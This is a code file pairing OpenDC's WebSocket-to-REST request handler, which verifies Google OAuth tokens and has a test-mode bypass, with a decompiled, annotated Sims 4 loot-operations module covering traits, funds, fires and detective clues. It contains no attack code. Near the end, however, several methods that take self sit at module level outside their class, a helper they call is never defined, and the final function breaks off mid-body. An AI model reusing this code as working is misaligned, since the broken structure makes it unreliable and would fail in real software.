<reponame>Koen1999/opendc<filename>opendc-web/opendc-web-api/opendc/util/rest.py<gh_stars>0
import importlib
import json
import os
from oauth2client import client, crypt
from opendc.util import exceptions, parameter_checker
from opendc.util.exceptions import ClientError
class Request:
    """WebSocket message to REST request mapping."""

    def __init__(self, message=None):
        """Initialize a Request from a socket message.

        Raises MissingRequestParameterError, UnimplementedEndpointError,
        UnsupportedMethodError or AuthorizationTokenError when the message
        cannot be mapped to a verified endpoint call.
        """
        # Get the Request parameters from the message
        if message is None:
            # Allows constructing an empty Request to populate manually.
            return
        try:
            self.message = message
            self.id = message['id']
            self.path = message['path']
            self.method = message['method']
            self.params_body = message['parameters']['body']
            self.params_path = message['parameters']['path']
            self.params_query = message['parameters']['query']
            self.token = message['token']
        except KeyError as exception:
            raise exceptions.MissingRequestParameterError(exception)
        # Parse the path and import the appropriate module
        try:
            self.path = message['path'].strip('/')
            module_base = 'opendc.api.{}.endpoint'
            # Path placeholders like {id} map onto module path segments.
            module_path = self.path.replace('{', '').replace('}', '').replace('/', '.')
            self.module = importlib.import_module(module_base.format(module_path))
        except ImportError as e:
            print(e)
            raise exceptions.UnimplementedEndpointError('Unimplemented endpoint: {}.'.format(self.path))
        # Check the method
        if self.method not in ['POST', 'GET', 'PUT', 'PATCH', 'DELETE']:
            raise exceptions.UnsupportedMethodError('Non-rest method: {}'.format(self.method))
        if not hasattr(self.module, self.method):
            raise exceptions.UnsupportedMethodError('Unimplemented method at endpoint {}: {}'.format(
                self.path, self.method))
        # Verify the user
        if "OPENDC_FLASK_TESTING" in os.environ:
            # Test mode bypasses Google token verification entirely.
            self.google_id = 'test'
            return
        try:
            self.google_id = self._verify_token(self.token)
        except crypt.AppIdentityError as e:
            raise exceptions.AuthorizationTokenError(e)

    def check_required_parameters(self, **kwargs):
        """Raise an error if a parameter is missing or of the wrong type."""
        try:
            parameter_checker.check(self, **kwargs)
        except exceptions.ParameterError as e:
            # Surface validation failures as a 400 client error response.
            raise ClientError(Response(400, str(e)))

    def process(self):
        """Process the Request and return a Response."""
        method = getattr(self.module, self.method)
        try:
            response = method(self)
        except ClientError as e:
            # Tag the error response with this request's id before returning.
            e.response.id = self.id
            return e.response
        response.id = self.id
        return response

    def to_JSON(self):
        """Return a JSON representation of this Request.

        Note: mutates the stored message, zeroing the id and stripping the
        auth token so it is safe to emit.
        """
        self.message['id'] = 0
        self.message['token'] = None
        return json.dumps(self.message)

    @staticmethod
    def _verify_token(token):
        """Return the ID of the signed-in user.

        Or throw an Exception if the token is invalid.
        """
        try:
            id_info = client.verify_id_token(token, os.environ['OPENDC_OAUTH_CLIENT_ID'])
        except Exception as e:
            print(e)
            raise crypt.AppIdentityError('Exception caught trying to verify ID token: {}'.format(e))
        # Reject tokens minted for another client or by another issuer.
        if id_info['aud'] != os.environ['OPENDC_OAUTH_CLIENT_ID']:
            raise crypt.AppIdentityError('Unrecognized client.')
        if id_info['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
            raise crypt.AppIdentityError('Wrong issuer.')
        return id_info['sub']
class Response:
    """Response to websocket mapping."""

    def __init__(self, status_code, status_description, content=None):
        """Initialize a new Response with an HTTP-style status."""
        self.id = 0
        self.status = {'code': status_code, 'description': status_description}
        self.content = content

    def to_JSON(self):
        """Return a JSON representation of this Response."""
        payload = {'id': self.id, 'status': self.status}
        if self.content is not None:
            payload['content'] = self.content
        # default=str stringifies non-serializable values (e.g. ObjectIds).
        return json.dumps(payload, default=str)
|
<filename>Scripts/simulation/interactions/utils/loot_ops.py
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\interactions\utils\loot_ops.py
# Compiled at: 2020-11-14 02:32:50
# Size of source mod 2**32: 64157 bytes
import random
from protocolbuffers import Consts_pb2, UI_pb2, DistributorOps_pb2
from protocolbuffers.DistributorOps_pb2 import SetWhimBucks
from protocolbuffers.InteractionOps_pb2 import TravelSimsToZone
from clock import ClockSpeedMode
from distributor.ops import BreakThroughMessage, GenericProtocolBufferOp
from distributor.system import Distributor
from event_testing.resolver import SingleActorAndObjectResolver, SingleObjectResolver
from event_testing.tests import TunableTestSet
from interactions import ParticipantType, ParticipantTypeSingleSim
from interactions.utils import LootType
from interactions.utils.loot_basic_op import BaseLootOperation, BaseTargetedLootOperation
from objects.components import types
from objects.components.inventory_enums import InventoryType
from objects.components.portal_lock_data import LockAllWithGenusException, LockAllWithSimIdExceptionData, LockAllWithSituationJobExceptionData, LockRankedStatisticData
from objects.components.portal_locking_enums import LockPriority, LockType, ClearLock
from objects.components.spawner_component_enums import SpawnerType
from objects.components.state import TunableStateValueReference
from objects.gallery_tuning import ContentSource
from objects.slot_strategy import SlotStrategyVariant
from sims.funds import FundsSource, get_funds_for_source
from sims.unlock_tracker import TunableUnlockVariant
from sims4 import math
from sims4.tuning.tunable import Tunable, TunableRange, TunableReference, OptionalTunable, TunableRealSecond, TunableVariant, TunableEnumEntry, TunableList, TunableFactory, HasTunableSingletonFactory, AutoFactoryInit, TunablePackSafeReference, TunableTuple, TunableEnumSet
from traits.trait_type import TraitType
from tunable_multiplier import TunableMultiplier
from ui.notebook_tuning import NotebookSubCategories
from ui.ui_dialog import UiDialogOk, CommandArgType
from ui.ui_dialog_labeled_icons import UiDialogAspirationProgress
from ui.ui_dialog_notification import UiDialogNotification
import build_buy, distributor.system, enum, event_testing, services, sims4.log, sims4.resources, tag, telemetry_helper, venues.venue_constants
logger = sims4.log.Logger('LootOperations')
# Multiplier converting an integer percentage into a fraction.
FLOAT_TO_PERCENT = 0.01
# Telemetry identifiers used when a detective clue is discovered.
TELEMETRY_GROUP_LOOT_OPS = 'LOOT'
TELEMETRY_HOOK_DETECTIVE_CLUE = 'DECL'
TELEMETRY_DETECTIVE_CLUE_FOUND = 'clue'
loot_op_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_LOOT_OPS)
class BaseGameLootOperation(BaseLootOperation):
    # Base for loot ops that never advertise to autonomy ('advertise' locked off).
    FACTORY_TUNABLES = {'locked_args': {'advertise': False}}
class LifeExtensionLootOp(BaseLootOperation):
    """Loot op that grants bonus days of life to the subject and can
    optionally modify the subject's aging progress."""

    class RestoreDaysFromAgingProgress(HasTunableSingletonFactory, AutoFactoryInit):
        # Rewinds a tuned number of days of age progress.
        FACTORY_TUNABLES = {'days_to_restore': TunableRange(tunable_type=int,
          default=0,
          minimum=0)}

        def perform(self, subject, *_, **__):
            subject.decrement_age_progress(self.days_to_restore)

    class ResetAgingProgressInCategory(HasTunableSingletonFactory, AutoFactoryInit):
        # Resets age progress to the start of the current category.
        def perform(self, subject, *_, **__):
            subject.reset_age_progress()

    class AddDaysToAgingProgress(HasTunableSingletonFactory, AutoFactoryInit):
        # Advances age progress by a tuned number of days.
        FACTORY_TUNABLES = {'days_to_add': TunableRange(tunable_type=int,
          default=0,
          minimum=0)}

        def perform(self, subject, *_, **__):
            subject.increment_age_progress(self.days_to_add)

    class FillAgingProgressInCategory(HasTunableSingletonFactory, AutoFactoryInit):
        # Fills age progress to the end of the current category.
        def perform(self, subject, *_, **__):
            subject.fill_age_progress()

    FACTORY_TUNABLES = {'bonus_days':TunableRange(description="\n Number of bonus days to be granted to the target's life.\n ",
      tunable_type=int,
      default=1,
      minimum=0),
     'modify_aging_progress':TunableVariant(description='\n If enabled, this loot will modify aging progress of a sim.\n ',
      restore_days_from_aging_progress=RestoreDaysFromAgingProgress.TunableFactory(),
      reset_aging_progress_in_category=ResetAgingProgressInCategory.TunableFactory(),
      add_days_to_aging_progress=AddDaysToAgingProgress.TunableFactory(),
      fill_aging_progress_in_category=FillAgingProgressInCategory.TunableFactory(),
      locked_args={'disabled': None},
      default='disabled')}

    def __init__(self, bonus_days, modify_aging_progress, **kwargs):
        (super().__init__)(**kwargs)
        self.bonus_days = bonus_days
        self.modify_aging_progress = modify_aging_progress

    @property
    def loot_type(self):
        return LootType.LIFE_EXTENSION

    def _apply_to_subject_and_target(self, subject, target, resolver):
        subject.add_bonus_days(self.bonus_days)
        # modify_aging_progress defaults to None ('disabled' locked arg).
        if self.modify_aging_progress is not None:
            self.modify_aging_progress.perform(subject)
class StateChangeLootOp(BaseLootOperation):
    """Loot op that sets a tuned state value on the subject object."""
    FACTORY_TUNABLES = {'description':'\n This loot will change the state of the subject.\n ',
     'state_value':TunableStateValueReference(),
     'force_update':Tunable(description="\n If checked, force update the subject's state.\n ",
      tunable_type=bool,
      default=False)}

    @TunableFactory.factory_option
    def subject_participant_type_options(**kwargs):
        # The subject can be tuned either as an interaction participant
        # or as every object carrying a given tag.
        return {'subject': TunableVariant(description='\n The subject of this loot.\n ',
          participant=TunableEnumEntry(description='"\n The participant type for the subject of this loot.\n ',
          tunable_type=ParticipantType,
          default=(ParticipantType.Actor),
          invalid_enums=(
         ParticipantType.Invalid,)),
          all_objects_with_tag=TunableEnumEntry(description='\n All objects with this tag.\n ',
          tunable_type=(tag.Tag),
          default=(tag.Tag.INVALID),
          invalid_enums=(
         tag.Tag.INVALID,)),
          default='participant')}

    def __init__(self, state_value, force_update, **kwargs):
        (super().__init__)(**kwargs)
        self.state_value = state_value
        self.force_update = force_update

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Sim infos resolve to their instanced object; non-instanced
        # recipients resolve to None and are skipped.
        subject_obj = self._get_object_from_recipient(subject)
        if subject_obj is not None:
            state_value = self.state_value
            subject_obj.set_state((state_value.state), state_value, force_update=(self.force_update))
class DialogLootOp(BaseLootOperation):
    """Loot op that shows a dialog (notification, ok-dialog, or aspiration
    progress) to the subject or the active Sim."""
    FACTORY_TUNABLES = {'dialog': TunableVariant(description='\n Type of dialog to show.\n ',
      notification=UiDialogNotification.TunableFactory(description='\n This text will display in a notification pop up when completed.\n '),
      dialog_ok=UiDialogOk.TunableFactory(description='\n Display a dialog with an okay button.\n '),
      aspiration_progress=UiDialogAspirationProgress.TunableFactory(description="\n Display a dialog that will show the Sim's progress towards one\n or more aspirations.\n "),
      default='notification')}

    def __init__(self, dialog, **kwargs):
        (super().__init__)(**kwargs)
        self.dialog = dialog

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Only show once the zone has loaded, and only for a selectable
        # (player-controlled) owner; non-Sim subjects fall back to the
        # active Sim.
        if subject is not None:
            if not services.current_zone().is_zone_loading:
                owner = subject if subject.is_sim else services.get_active_sim()
                if owner is not None:
                    if owner.is_selectable:
                        dialog = self.dialog(owner, resolver)
                        dialog.show_dialog(event_id=(self.dialog.factory.DIALOG_MSG_TYPE))
class AddTraitLootOp(BaseLootOperation):
    """Loot op that adds a tuned trait to the subject."""
    FACTORY_TUNABLES = {'description':'\n This loot will add the specified trait.\n ',
     'trait':TunableReference(description='\n The trait to be added.\n ',
      manager=services.get_instance_manager(sims4.resources.Types.TRAIT))}

    def __init__(self, trait, **kwargs):
        (super().__init__)(**kwargs)
        self._trait = trait

    def _apply_to_subject_and_target(self, subject, target, resolver):
        subject.add_trait(self._trait)
class RemoveTraitLootOp(BaseLootOperation):
    """Loot op removing one or more traits from the subject, selected by a
    tuned strategy: a specific trait, a random trait of a type, a random
    personality trait, or all traits of given types."""

    class _BaseRemoveTrait(HasTunableSingletonFactory, AutoFactoryInit):
        # Strategy interface: subclasses return an iterable of traits.
        def get_traits_to_remove(self, subject, target, resolver):
            raise NotImplementedError('Attempting to use the _BaseRemoveTrait base class, use sub-classes instead.')

    class _RemoveSpecificTrait(_BaseRemoveTrait):
        FACTORY_TUNABLES = {'specific_trait': TunablePackSafeReference(description='\n The trait to be removed.\n ',
          manager=(services.get_instance_manager(sims4.resources.Types.TRAIT)))}

        def get_traits_to_remove(self, subject, target, resolver):
            return (
             self.specific_trait,)

    class _RemoveRandomTrait(_BaseRemoveTrait):
        # NOTE(review): invalid_enums here is a bare parenthesized enum, not
        # a one-element tuple as in every other TunableEnumEntry in this
        # module, and it names the same value as default= — verify against
        # the original (non-decompiled) source before relying on it.
        FACTORY_TUNABLES = {'trait_type': TunableEnumEntry(default=(TraitType.PERSONALITY),
          tunable_type=TraitType,
          invalid_enums=(TraitType.PERSONALITY))}

        def get_traits_to_remove(self, subject, target, resolver):
            trait_to_remove = None
            traits_to_consider = [trait for trait in subject.trait_tracker if trait.trait_type == self.trait_type]
            if traits_to_consider:
                trait_to_remove = random.choice(traits_to_consider)
            else:
                logger.warn('_RemoveRandomTrait could not find a valid trait to remove.')
            # May contain None when nothing matched; caller filters.
            return (trait_to_remove,)

    class _RemoveRandomPersonalityTrait(_BaseRemoveTrait):
        FACTORY_TUNABLES = {'traits_to_not_consider': TunableList(description='\n Personality traits that should not be considered for removal. Leave\n blank to consider all personality traits.\n ',
          tunable=TunableReference(description='\n A personality trait that should not be removed.\n ',
          manager=(services.get_instance_manager(sims4.resources.Types.TRAIT)),
          pack_safe=True))}

        def get_traits_to_remove(self, subject, target, resolver):
            trait_to_remove = None
            personality_traits_to_consider = [trait for trait in subject.trait_tracker.personality_traits if trait not in self.traits_to_not_consider]
            if personality_traits_to_consider:
                trait_to_remove = random.choice(personality_traits_to_consider)
            else:
                logger.warn('RemoveRandomPersonalityTraitLootOp could not find a valid personality trait to remove.')
            # May contain None when nothing matched; caller filters.
            return (trait_to_remove,)

    class _RemoveTraitsOfType(_BaseRemoveTrait):
        FACTORY_TUNABLES = {'trait_types': TunableEnumSet(description='\n A set of trait types to find and remove.\n ',
          enum_type=TraitType,
          enum_default=(TraitType.GAMEPLAY),
          allow_empty_set=False)}

        def get_traits_to_remove(self, subject, target, resolver):
            trait_tracker = subject.trait_tracker
            if trait_tracker is None:
                return ()
            traits = []
            for trait_type in self.trait_types:
                traits.extend(trait_tracker.get_traits_of_type(trait_type))
            return traits

    FACTORY_TUNABLES = {'trait': TunableVariant(description='\n Type of trait removal to perform.\n ',
      specific_trait=(_RemoveSpecificTrait.TunableFactory()),
      random_personality_trait=(_RemoveRandomPersonalityTrait.TunableFactory()),
      random_trait=(_RemoveRandomTrait.TunableFactory()),
      traits_of_type=(_RemoveTraitsOfType.TunableFactory()),
      default='specific_trait')}

    def __init__(self, trait, **kwargs):
        (super().__init__)(**kwargs)
        # _trait holds the removal *strategy*, not a trait instance.
        self._trait = trait

    def _apply_to_subject_and_target(self, subject, target, resolver):
        traits_to_remove = self._trait.get_traits_to_remove(subject, target, resolver)
        for trait_to_remove in traits_to_remove:
            # Strategies may yield None when no candidate was found.
            if trait_to_remove is not None:
                subject.remove_trait(trait_to_remove)
class HouseholdFundsInterestLootOp(BaseLootOperation):
    """Pays interest on the subject's household funds, with an optional
    notification showing the payout."""
    FACTORY_TUNABLES = {'description':'\n This loot will deliver interest income to the current Household for their current funds,\n based on the percentage tuned against total held. \n ',
     'interest_rate':Tunable(description='\n The percentage of interest to apply to current funds.\n ',
      tunable_type=int,
      default=0),
     'notification':OptionalTunable(description='\n If enabled, this notification will display when this interest payment is made.\n Token 0 is the Sim - i.e. {0.SimFirstName}\n Token 1 is the interest payment amount - i.e. {1.Money}\n ',
      tunable=UiDialogNotification.TunableFactory())}

    def __init__(self, interest_rate, notification, **kwargs):
        (super().__init__)(**kwargs)
        self._interest_rate = interest_rate
        self._notification = notification

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # interest_rate is an integer percentage; FLOAT_TO_PERCENT converts
        # it to a fraction. Payout is truncated to a whole simoleon.
        pay_out = int(subject.household.funds.money * self._interest_rate * FLOAT_TO_PERCENT)
        subject.household.funds.add(pay_out, Consts_pb2.TELEMETRY_INTERACTION_REWARD, self._get_object_from_recipient(subject))
        if self._notification is not None:
            dialog = self._notification(subject, resolver)
            dialog.show_dialog(event_id=(self._notification.factory.DIALOG_MSG_TYPE), additional_tokens=(
             pay_out,))
class FireLootOp(BaseLootOperation):
    """Spawns a tuned number of fires at the subject object."""
    FACTORY_TUNABLES = {'fire_count': TunableRange(description='\n The number of fires to create. Because of placement restrictions or fire availability, \n there is no guarantee that this many fires will be created.\n ',
      tunable_type=int,
      default=1,
      minimum=1,
      maximum=10)}

    def __init__(self, fire_count, **kwargs):
        (super().__init__)(**kwargs)
        self._fire_count = fire_count

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject is None:
            logger.error('Invalid subject specified for this loot operation. {} Please fix in tuning.', self)
            return
        # Fires spawn at a world object, so resolve the recipient first.
        subject_obj = self._get_object_from_recipient(subject)
        if subject_obj is None:
            logger.error('No valid object for subject specified for this loot operation. {} Please fix in tuning.', resolver)
            return
        fire_service = services.get_fire_service()
        fire_service.spawn_fire_at_object(subject_obj, num_fires=(self._fire_count))
class UnlockLootOp(BaseLootOperation):
    """Grants a tuned unlock item to the subject Sim's unlock tracker,
    optionally showing a notification with the item's display name."""
    FACTORY_TUNABLES = {'unlock_item':TunableUnlockVariant(description='\n The unlock item that will be given to the Sim.\n Note that if the item has a custom name, it will not be persisted through the Gallery.\n '),
     'notification':OptionalTunable(description='\n If enabled, this notification will display when the item is unlocked.\n The display name of the unlock will be added as a string token.\n ',
      tunable=UiDialogNotification.TunableFactory())}

    def __init__(self, unlock_item, notification, **kwargs):
        super().__init__(**kwargs)
        self._unlock_item = unlock_item
        self._notification = notification

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Guard clauses. The decompiled original returned unconditionally
        # after the is_sim check (an `else: ...; return` artifact), which
        # made the unlock logic below unreachable; restructured so only
        # invalid subjects bail out early.
        if subject is None:
            logger.error('Subject {} is None for the loot {}..', self.subject, self)
            return
        if not subject.is_sim:
            logger.error('Subject {} is not Sim for the loot {}.', self.subject, self)
            return
        if subject.unlock_tracker is None:
            return
        if self._unlock_item is None:
            return
        # unlock_as_new is optional on unlock items; default to False.
        mark_as_new = getattr(self._unlock_item, 'unlock_as_new', False)
        subject.unlock_tracker.add_unlock((self._unlock_item), None, mark_as_new=mark_as_new)
        if self._notification is not None:
            dialog = self._notification(subject, resolver)
            dialog.show_dialog(event_id=(self._notification.factory.DIALOG_MSG_TYPE), response_command_tuple=(
             CommandArgType.ARG_TYPE_INT, subject.sim_id),
              additional_tokens=(
             self._unlock_item.get_display_name(subject),))
class CollectibleShelveItem(BaseLootOperation):
    """Slots the subject collectible into the first empty matching runtime
    slot on the target object (e.g. a display shelf)."""

    def __init__(self, *args, **kwargs):
        # Fix: forward positional args with *args. The original passed the
        # args tuple itself as a single positional argument, unlike every
        # sibling loot op in this module.
        super().__init__(*args, target_participant_type=ParticipantType.Object, **kwargs)

    def _apply_to_subject_and_target(self, subject, target, resolver):
        """Returns True when the subject was slotted, False otherwise."""
        target_slot = subject.get_collectible_slot()
        if target_slot:
            # Match target slots by the hashed bone name of the collectible slot.
            for runtime_slot in target.get_runtime_slots_gen(bone_name_hash=(sims4.hash_util.hash32(target_slot))):
                if runtime_slot and runtime_slot.empty:
                    runtime_slot.add_child(subject)
                    return True
        return False
class FireDeactivateSprinklerLootOp(BaseLootOperation):
    """Turns off the lot's sprinkler system via the fire service."""

    def _apply_to_subject_and_target(self, subject, target, resolver):
        fire_service = services.get_fire_service()
        if fire_service is None:
            # No fire service available; nothing to deactivate.
            return
        fire_service.deactivate_sprinkler_system()
class ExtinguishNearbyFireLootOp(BaseLootOperation):
    """Extinguishes fires near the subject via the fire service."""

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject is None:
            logger.error('Subject {} is None for the loot {}..', self.subject, self)
            return
        fire_service = services.get_fire_service()
        if fire_service is None:
            logger.error('Fire Service in none when calling the lootop: {}.', self)
            return
        # Resolve the recipient to its world object before querying proximity.
        subject = self._get_object_from_recipient(subject)
        fire_service.extinguish_nearby_fires(subject)
        return True
class AwardWhimBucksLootOp(BaseLootOperation):
    """Awards a tuned number of whim (satisfaction) bucks to the subject Sim."""
    FACTORY_TUNABLES = {'description':'\n This loot will give the specified number of whim bucks to the sim. \n ',
     'whim_bucks':TunableRange(description='\n The number of whim bucks to give.\n ',
      tunable_type=int,
      default=1,
      minimum=1)}

    def __init__(self, whim_bucks, **kwargs):
        (super().__init__)(**kwargs)
        self._whim_bucks = whim_bucks

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject is None:
            logger.error('Subject {} is None for the loot {}..', self.subject, self)
            return False
        # SetWhimBucks.COMMAND tags the award's source for the client.
        subject.add_whim_bucks(self._whim_bucks, SetWhimBucks.COMMAND)
class RefreshWhimsLootOp(BaseLootOperation):
    """Re-rolls the subject Sim's current whims, when it has a whim tracker."""

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject is None:
            logger.error('Subject {} is None for the loot {}..', self.subject, self)
            return
        whim_tracker = subject.whim_tracker
        if whim_tracker is not None:
            whim_tracker.refresh_whims()
class RefreshInventoryItemsDecayModifiers(BaseLootOperation):
    """Refreshes decay modifiers on every inventory item currently stored
    in one of the tuned inventory types."""
    FACTORY_TUNABLES = {'inventory_types':TunableList(description='\n List of inventory type that we need to refresh. Inventory item object\n which currently is in one of this inventory types will be refreshed.\n ',
      tunable=TunableEnumEntry(description='\n The type of inventory.\n ',
      tunable_type=InventoryType,
      default=(InventoryType.UNDEFINED),
      pack_safe=True)),
     'locked_args':{'subject': None}}

    def __init__(self, *args, inventory_types, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.inventory_types = inventory_types

    def _apply_to_subject_and_target(self, subject, target, resolver):
        # Subject is locked to None; this op scans the global inventory
        # manager rather than a participant.
        inventory_manager = services.inventory_manager()
        for obj in inventory_manager.objects:
            inventory_item_component = obj.inventoryitem_component
            inventory_type = inventory_item_component.current_inventory_type
            if inventory_type is not None and inventory_type in self.inventory_types:
                inventory_item_component.refresh_decay_modifiers()
class DiscoverClueLootOp(BaseTargetedLootOperation):
    """Pops the next unused clue from the subject's detective career,
    shows its notification, unlocks its notebook entry, and records
    telemetry. Falls back to tuned loot actions when no clues remain."""
    FACTORY_TUNABLES = {'career_reference':TunableReference(description='\n A reference to the detective career that keeps track of what clues\n to display to the player.\n ',
      manager=services.get_instance_manager(sims4.resources.Types.CAREER),
      class_restrictions=('DetectiveCareer', )),
     'fallback_actions':TunableReference(description='\n List of loot actions that will occur if there are no more clues to\n be discovered. This can be used to hook up a notification, for\n example.\n ',
      manager=services.get_instance_manager(sims4.resources.Types.ACTION),
      allow_none=True,
      class_restrictions=('LootActions', 'RandomWeightedLoot'))}

    def __init__(self, *args, career_reference, fallback_actions, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.career_reference = career_reference
        self.fallback_actions = fallback_actions

    @property
    def loot_type(self):
        return LootType.DISCOVER_CLUE

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if subject.notebook_tracker is None:
            logger.warn("Trying to award a DiscoverClueLootOp to {}, but they don't have a notebook. LOD issue?", subject)
            return
        else:
            career = subject.careers.get(self.career_reference.guid64)
            if career is None:
                logger.error('Failed to find career {} on Sim {}.', (self.career_reference),
                  subject, owner='bhill')
                return
            clue = career.pop_unused_clue()
            if clue is None:
                # All clues found; run the tuned fallback loot instead.
                if self.fallback_actions:
                    for action in self.fallback_actions:
                        action.apply_to_resolver(resolver)
                return
            if clue.notification is not None:
                dialog = clue.notification(subject, resolver=resolver)
                if dialog is not None:
                    dialog.show_dialog()
            if clue.notebook_entry is not None:
                subject.notebook_tracker.unlock_entry(clue.notebook_entry())
            # Record which clue was found for telemetry.
            with telemetry_helper.begin_hook(loot_op_telemetry_writer, TELEMETRY_HOOK_DETECTIVE_CLUE, sim_info=subject) as (hook):
                hook.write_guid(TELEMETRY_DETECTIVE_CLUE_FOUND, clue.guid64)
class NewCrimeLootOp(BaseTargetedLootOperation):
    """Starts tracking a new crime on the subject's detective career."""
    FACTORY_TUNABLES = {'career_reference': TunableReference(description='\n A reference to the detective career that keeps track of what crime\n is currently being tracked.\n ',
      manager=(services.get_instance_manager(sims4.resources.Types.CAREER)),
      class_restrictions=('DetectiveCareer', ))}

    def __init__(self, *args, career_reference, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.career_reference = career_reference

    @property
    def loot_type(self):
        return LootType.NEW_CRIME

    def _apply_to_subject_and_target(self, subject, target, resolver):
        career = subject.careers.get(self.career_reference.guid64)
        if career is None:
            logger.error('Failed to find career {} on Sim {}.', (self.career_reference),
              subject, owner='bhill')
            return
        career.create_new_crime_data()
class BreakThroughLootOperation(BaseLootOperation):
    """Shows the breakthrough headline effect over the subject Sim, with
    progress read from a tuned commodity."""
    FACTORY_TUNABLES = {'breakthrough_commodity':TunableReference(description='\n The commodity that tracks the breakthrough progress.\n ',
      manager=services.get_instance_manager(sims4.resources.Types.STATISTIC)),
     'time':TunableRealSecond(description='\n The amount of time, in real seconds, to show headline effect.\n ',
      default=5)}

    def __init__(self, *args, breakthrough_commodity, time, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.breakthrough_commodity = breakthrough_commodity
        self.time = time

    def _apply_to_subject_and_target(self, subject, target, resolver):
        if not subject.is_sim:
            logger.error('Subject {} is not a Sim for the loot {}.', self.subject, self)
            return
        # Progress defaults to 0 when the Sim lacks the commodity
        # (add=False avoids creating it just to read it).
        progress = 0
        commodity = subject.get_statistic((self.breakthrough_commodity), add=False)
        if commodity is not None:
            progress = int(100 * commodity.get_normalized_value())
        op = BreakThroughMessage(sim_id=(subject.id), progress=progress, display_time=(self.time))
        distributor.system.Distributor.instance().add_op(subject, op)
class DestroyObjectsFromInventorySource(enum.Int):
    # Which inventory storage to scan for objects to destroy.
    ALL_STORAGE = 0
    VISIBLE_STORAGE = 1
    HIDDEN_STORAGE = 2
class DestroyObjectsFromInventoryLootOp(BaseLootOperation):
    """Destroys inventory objects matching tuned tests, up to a tuned count,
    optionally awarding their value (with multipliers) to a Sim."""
    FACTORY_TUNABLES = {'description':"\n Destroy every object in the target's inventory that passes the\n tuned tests.\n ",
     'object_tests':TunableTestSet(description='\n A list of tests to apply to all objects in the target inventory.\n Every object that passes these tests will be destroyed.\n '),
     'object_source':TunableEnumEntry(description="\n The target's inventory storage types to search for objects to\n destroy.\n ",
      tunable_type=DestroyObjectsFromInventorySource,
      default=DestroyObjectsFromInventorySource.ALL_STORAGE),
     'count':TunableVariant(description='\n The total number of objects to destroy. If multiple types of objects\n match the criteria test, an arbitrary set of objects, no more than\n the specified count, is destroyed.\n ',
      number=TunableRange(tunable_type=int, default=1, minimum=0),
      locked_args={'all': math.MAX_INT32},
      default='all'),
     'award_value':OptionalTunable(description="\n If necessary, define how an amount corresponding to the objects'\n value is given to Sims.\n ",
      tunable=TunableTuple(recipient=TunableEnumEntry(description='\n Who to award funds to.\n ',
      tunable_type=ParticipantTypeSingleSim,
      default=(ParticipantTypeSingleSim.Actor),
      invalid_enums=(
     ParticipantTypeSingleSim.Invalid,)),
      funds=TunableEnumEntry(description='\n Where to award funds to. This can go to household\n funds by default, or to business funds.\n ',
      tunable_type=FundsSource,
      default=(FundsSource.HOUSEHOLD)),
      multiplier=TunableRange(description='\n Value multiplier for the award.\n ',
      tunable_type=float,
      default=1.0,
      minimum=0.0),
      tested_multipliers=TunableMultiplier.TunableFactory(description='\n Each multiplier that passes its test set will be applied to\n each award payment.\n ')))}
    def __init__(self, *args, object_tests, object_source, count, award_value, **kwargs):
        (super().__init__)(*args, **kwargs)
        self.object_tests = object_tests
        self.object_source = object_source
        # count may be math.MAX_INT32 when tuned as 'all'.
        self.count = count
        self.award_value = award_value
    def _apply_to_subject_and_target(self, subject, target, resolver):
        """Destroy matching objects from the subject's inventory and, when
        award_value is tuned, pay out their accumulated value."""
        inventory = self._get_subject_inventory(subject)
        if inventory is None:
            return
        objects_to_destroy = self._get_objects_and_award_values(inventory, resolver)
        award_value = 0
        pending_count = self.count
        for obj, value in objects_to_destroy.items():
            # Stacks count each item toward the destruction budget.
            count = min(pending_count, obj.stack_count())
            if inventory.try_destroy_object(obj, count=count, source=self, cause='Destroying specified objects from inventory loot op.'):
                pending_count -= count
                if self.award_value:
                    award_value += count * value
            else:
                logger.error('Error trying to destroy object {}.', obj)
            if pending_count <= 0:
                break
        if award_value > 0:
            recipient = resolver.get_participant(self.award_value.recipient).get_sim_instance()
            # Interaction category tags travel with the payment for telemetry.
            tags = set()
            if resolver.interaction is not None:
                tags |= resolver.interaction.get_category_tags()
            funds = get_funds_for_source((self.award_value.funds), sim=recipient)
            funds.add(award_value, (Consts_pb2.TELEMETRY_OBJECT_SELL), recipient, tags=tags)
def get_simoleon_delta(self, interaction, target, context, **interaction_parameters):
    """Predict the Simoleon payout of running this loot, without destroying.

    Returns a (delta, FundsSource) pair; (0, HOUSEHOLD) when no award is
    tuned or the subject has no inventory.
    """
    if self.award_value is None:
        return (0, FundsSource.HOUSEHOLD)
    resolver = interaction.get_resolver(target, context, **interaction_parameters)
    inventory = self._get_subject_inventory(resolver.get_participant(self.subject))
    if inventory is None:
        return (0, FundsSource.HOUSEHOLD)
    total = 0
    remaining = self.count
    for obj, value in self._get_objects_and_award_values(inventory, resolver).items():
        # Mirror the destroy loop: at most `remaining` units per stack.
        destroyed = min(remaining, obj.stack_count())
        total += destroyed * value
        remaining -= destroyed
        if remaining <= 0:
            break
    return (total, self.award_value.funds)
def _get_subject_inventory(self, subject):
    """Return the inventory component owning *subject*'s objects, or None.

    Sims are resolved to their instanced sim first; a missing inventory is
    logged as an error.
    """
    owner = subject.get_sim_instance() if subject.is_sim else subject
    inventory = getattr(owner, 'inventory_component', None)
    if inventory is not None:
        return inventory
    logger.error('Subject {} does not have an inventory to check for objects to destroy.', owner)
    return None
def _get_object_source(self, inventory):
    """Map the tuned object_source enum to the matching storage iterable.

    Falls back to an empty tuple (and logs) for unknown enum values.
    """
    source = self.object_source
